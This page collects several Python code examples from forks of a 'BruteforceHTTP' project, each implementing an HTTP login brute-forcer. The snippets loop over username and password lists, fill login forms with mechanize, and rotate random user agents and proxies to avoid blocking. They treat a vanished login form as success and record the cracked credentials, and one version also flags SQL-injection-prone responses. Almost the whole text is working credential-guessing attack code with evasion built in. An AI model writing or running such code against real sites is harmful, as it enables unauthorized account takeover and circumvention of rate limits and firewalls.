コード例 #1
0
ファイル: loginbrute.py プロジェクト: taicv/BruteforceHTTP
def submit(optionURL, tryCred, setProxyList, setKeyFalse, optionVerbose,
           loginInfo, result, optionReauth):

    #	Get login form field informations

    # BUG parse form issue with gmail, move to tbrowser.parseLoginForm
    frmLoginID, frmFields = loginInfo
    tryPassword, tryUsername = tryCred

    proc = tbrowser.startBrowser()

    user_agent = tbrowser.useragent()
    proc.addheaders = [('User-Agent', user_agent)]

    for cred in list(result.queue):
        if tryUsername == cred[0]:
            return 0  # don't run if find password of username

    if setProxyList:
        #Set proxy connect
        proxyAddr = actions.randomFromList(setProxyList)
        proc.set_proxies({"http": proxyAddr})

    try:

        proc.open(optionURL)

        #	Select login form

        proc.select_form(nr=frmLoginID)

        # FILLS ALL FIELDS https://stackoverflow.com/a/5389578

        for field, cred in zip(frmFields, tryCred):
            proc.form[field] = cred

        #	Send request
        proc.submit()

        if optionVerbose:
            utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
            if setProxyList:
                utils.printf("Using proxy: %s" % (proxyAddr), 'norm')

        #	Reload - useful for redirect to dashboard
        proc.reload()
        #	If no login form -> success
        #	TODO improve condition to use captcha

        if not tbrowser.parseLoginForm(proc.forms()):

            if setKeyFalse:
                if setKeyFalse not in proc.response().read():

                    # Add creds to success list
                    # If verbose: print
                    if tryUsername:
                        utils.printf(
                            "[*] Match found: %s:%s" %
                            (tryUsername, tryPassword), "good")
                        #result.put([tryUsername, tryPassword])
                    else:
                        utils.printf("[*] Password found: %s" % (tryPassword),
                                     "good")
                        #result.put([tryPassword])
                    if not optionReauth:
                        result.put([tryUsername, tryPassword])
                    else:
                        result.put([
                            optionURL.split("/")[2], tryUsername, tryPassword
                        ])

                    #	Clear object and try new username

                else:
                    if optionVerbose:
                        utils.printf(
                            "[-] Failed: %s:%s" % (tryUsername, tryPassword),
                            "bad")

            else:
                if tryUsername:
                    utils.printf(
                        "[*] Match found: %s:%s" % (tryUsername, tryPassword),
                        "good")
                    #result.put([tryUsername, tryPassword])
                else:
                    utils.printf("[*] Password found: %s" % (tryPassword),
                                 "good")
                    #result.put([tryPassword])
                if not optionReauth:
                    result.put([tryUsername, tryPassword])
                else:
                    result.put(
                        [optionURL.split("/")[2], tryUsername, tryPassword])

                #	Clear object and try new username
        else:
            if optionVerbose:
                utils.printf("[-] Failed: %s:%s" % (tryUsername, tryPassword),
                             "bad")

    except mechanize.HTTPError as error:
        #	Get blocked
        if optionVerbose:
            utils.printf(
                "[x] Error: %s:%s\n%s at %s" %
                (tryUsername, tryPassword, error, optionURL), "bad")
        return False

    except Exception as error:
        if optionVerbose:
            utils.printf(
                "[x] Error: %s:%s\n%s at %s" %
                (tryUsername, tryPassword, error, optionURL), "bad")
        return False

    finally:
        proc.close()
    return True
コード例 #2
0
def useragent():
    agents = data.getAgent()

    return actions.randomFromList(agents.split("\n"))
コード例 #3
0
def submit(options, loginInfo, tryCred, result):

	#	Get login form field informations
	
	# frmLoginID, frmFields = loginInfo
	tryPassword, tryUsername = tryCred

	proc = startBrowser()
	
	for cred in list(result.queue):
		if tryUsername == cred[1]:
			return True
	
	if options.proxy:
		# Set proxy connect
		proxyAddr = randomFromList(options.proxy)
		proc.set_proxies({"http": proxyAddr})
	
	try:
		proc.open(options.login_url)
		_form = parseLoginForm(proc.forms())
		if not _form:
			if options.verbose:
				printf("[x] LoginBrute: No login form found. Possibly get blocked!")
			return False
		else:
			frmLoginID, frmFields = _form
			frmUsername, _ = frmFields
		if options.verbose and loginInfo != _form:
			printf("[+] Warning: Form field has been changed!")

		#	Select login form
		proc.select_form(nr = frmLoginID)
		
		# FILLS ALL FIELDS https://stackoverflow.com/a/5389578
		proc.form[frmUsername] = tryUsername
		proc.submit()
		_, _, frmPasswd = parseLoginForm(proc.forms())
		proc.form[frmPasswd] = tryPassword
		proc.submit()
		# page_title = proc.title()
		#	Send request

		if options.verbose:
			if options.proxy:
				printf("[+] Trying: %s through %s" %([tryUsername, tryPassword],proxyAddr), 'norm')
			else:
				printf("[+] Trying: %s" %([tryUsername, tryPassword]), 'norm')
		
		#	Reload the browser. For javascript redirection and others...
		# proc.reload()
		#	If no login form -> maybe success. Check conditions
		
		if not parseLoginForm(proc.forms()):# != loginInfo:
			test_result = check_condition(options, proc, loginInfo)
			
			if test_result == 1:
				printf("[*] Page title: ['%s']" %(proc.title()), "good")
				# "If we tried login form with username+password field"
				if tryUsername:
					printf("[*] Found: %s" %([tryUsername, tryPassword]), "good")
				# "Else If we tried login form with password field only"
				else:
					printf("[*] Found: %s" %([tryPassword]), "good")
				result.put([options.url, tryUsername, tryPassword])
			elif test_result == 2 and options.verbose:
				printf("[+] SQL Injection vulnerable found")
				printf("   %s" %([tryUsername, tryPassword]), "norm")
			else:
				# Possibly Error. But sometime it is true
				if options.verbose:
					printf("[x] Get error page: %s" %([tryUsername, tryPassword]), "bad")
					printf("   [x] Page title: ['%s']" %(proc.title()), "bad")
		
		# "Login form is still there. Oops"
		else:
			# TODO test if web has similar text (static)
			if sqlerror(proc.response().read()) and options.verbose:
				printf("[+] SQL Injection vulnerable found")
				printf("   %s" %([tryUsername, tryPassword]), "norm")
			if options.verbose:
				if options.proxy:
					printf(
						"[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr),
						"bad"
					)
				else:
					printf(
						"[-] Failed: %s" %([tryUsername, tryPassword]),
						"bad"
					)
		return True

	except Exception as error:
		"""
			Sometimes, web servers return error code because of bad configurations,
			but our cred is true.
			This code block showing information, for special cases
		"""		

		try:
			# Unauthenticated
			if error.code == 401:
				if options.verbose:
					printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad")
			# Server misconfiguration? Panel URL is deleted or wrong
			elif error.code == 404:
				printf("[x] %s: %s" %(error, tryCred[::-1]), "bad")
				if options.verbose:
					printf("   %s" %(proc.url()), "bad")
			# Other error code
			else:
				if options.verbose:
					printf("[x] (%s): %s" %(proc.url(), tryCred[::-1]), "bad")
		except:
			# THIS BLOCKED BY WAF
			printf("[x] Loginbrute: %s" %(error), "bad")
		return False

	finally:
		proc.close()
コード例 #4
0
def useragent():
	# Try random agent everytime it is called
	# TODO better useragent with library (or create my own - takes time)
	return randomFromList(data.getAgent().split("\n"))
コード例 #5
0
def useragent():
    return randomFromList(data.getAgent().split("\n"))
コード例 #6
0
ファイル: httpbrute.py プロジェクト: livesguan/BruteforceHTTP
def handle(optionURL, optionUserlist, optionPasslist, sizePasslist,
           setProxyList, setKeyFalse):
    ############################################
    #	Old code logic:
    #		Create 1 browser object per password
    #	Current:
    #		Create 1 browser object per username
    #		Pick 1 user agent per password try
    #
    ############################################

    #	Get login form field informations
    frmLoginID, frmUserfield, frmPassfield = parseFormInfo(optionURL)
    #	Get single Username in username list / file
    for tryUsername in optionUserlist:
        #	If tryUsername is file object, remove \n
        #	tryUsername = tryUsername[:-1]
        tryUsername = tryUsername.replace('\n', '')
        try:
            optionPasslist.seek(0)
        except:
            pass

        ######	new test code block
        proc = tbrowser.startBrowser()
        # proc = mechanize.Browser()
        # proc.set_handle_robots(False)
        ######

        idxTry = 0
        for tryPassword in optionPasslist:
            #	Get single Password, remove \n
            tryPassword = tryPassword.replace('\n', '')

            #	New test code block: add new user_agent each try
            user_agent = tbrowser.useragent()
            proc.addheaders = [('User-Agent', user_agent)]

            #print "Debug: %s:%s" %(tryUsername, tryPassword)

            if setProxyList:
                #Set proxy connect
                proxyAddr = actions.randomFromList(setProxyList)
                #utils.printf("Debug: proxy addr %s" %(proxyAddr))
                proc.set_proxies({"http": proxyAddr})

            proc.open(optionURL)
            #	End new code block

            try:
                idxTry += 1

                #	Select login form
                proc.select_form(nr=frmLoginID)
                proc.form[frmUserfield] = tryUsername
                proc.form[frmPassfield] = tryPassword

                #	Print status bar
                utils.printp(tryUsername, idxTry, sizePasslist)

                #	Send request
                proc.submit()

                #	Reload - useful for redirect to dashboard
                proc.reload()

                #	If no login form -> success
                #	TODO improve condition to use captcha
                if not tbrowser.getLoginForm(proc.forms()):

                    #TODO edit mixed condition
                    if setKeyFalse:
                        if setKeyFalse not in proc.response().read():

                            # Add creds to success list
                            # If verbose: print

                            printSuccess(tryUsername, tryPassword)

                            #	Clear object and try new username
                            proc.close()
                            break
                    else:
                        utils.printSuccess(tryUsername, tryPassword)

                        #	Clear object and try new username
                        proc.close()
                        break

            except mechanize.HTTPError as error:
                #	Get blocked
                utils.die("Thread has been blocked", error)

        proc.close()
コード例 #7
0
ファイル: loginbrute.py プロジェクト: u53r55/BruteforceHTTP
def submit(optionURL, tryUsername, tryPassword, sizeTask, setProxyList,
           setKeyFalse, optionVerbose, loginInfo, result):
    ############################################
    #	Old code logic:
    #		Create 1 browser object per password
    #	Current:
    #		Create 1 browser object per username
    #		Pick 1 user agent per password try
    #
    ############################################

    #	Get login form field informations
    frmLoginID, frmUserfield, frmPassfield = loginInfo
    #	Get single Username in username list / file

    proc = tbrowser.startBrowser()

    #	Get single Password, remove \n

    #	New test code block: add new user_agent each try
    user_agent = tbrowser.useragent()
    proc.addheaders = [('User-Agent', user_agent)]

    for cred in list(result.queue):
        if tryUsername == cred[0]:
            # if optionVerbose:
            # 	utils.printf("Canceled: %s:%s" %(tryUsername, tryPassword))
            return 0  # don't run if find password of username

    if setProxyList:
        #Set proxy connect
        proxyAddr = actions.randomFromList(setProxyList)
        #utils.printf("Debug: proxy addr %s" %(proxyAddr))
        proc.set_proxies({"http": proxyAddr})

    proc.open(optionURL)
    #	End new code block

    try:

        #	Select login form
        proc.select_form(nr=frmLoginID)
        proc.form[frmUserfield] = tryUsername
        proc.form[frmPassfield] = tryPassword

        #	Send request
        proc.submit()

        #	Print status bar
        if optionVerbose:
            utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
            if setProxyList:
                utils.printf("Using proxy: %s" % (proxyAddr), 'norm')

        #utils.printp(trying, sizeTask)

        #proc.submit()
        #	Reload - useful for redirect to dashboard
        proc.reload()
        #	If no login form -> success
        #	TODO improve condition to use captcha

        if not tbrowser.parseLoginForm(proc.forms()):

            if setKeyFalse:
                if setKeyFalse not in proc.response().read():

                    # Add creds to success list
                    # If verbose: print

                    utils.printf(
                        "Match found: %s:%s" % (tryUsername, tryPassword),
                        "good")
                    result.put([tryUsername, tryPassword])

                    #	Clear object and try new username
                    proc.close()

                else:
                    if optionVerbose:
                        utils.printf(
                            "Failed: %s:%s" % (tryUsername, tryPassword),
                            "bad")

            else:
                utils.printf("Match found: %s:%s" % (tryUsername, tryPassword),
                             "good")
                result.put([tryUsername, tryPassword])

                #	Clear object and try new username
                proc.close()
        else:
            if optionVerbose:
                utils.printf("Failed: %s:%s" % (tryUsername, tryPassword),
                             "bad")

    except mechanize.HTTPError as error:
        #	Get blocked
        if optionVerbose:
            utils.printf(
                "Error: %s:%s\n%s" % (tryUsername, tryPassword, error), "bad")
        return False
    except Exception as error:

        if optionVerbose:
            utils.printf(
                "Error: %s:%s\n%s" % (tryUsername, tryPassword, error), "bad")
        return False

    proc.close()
    return True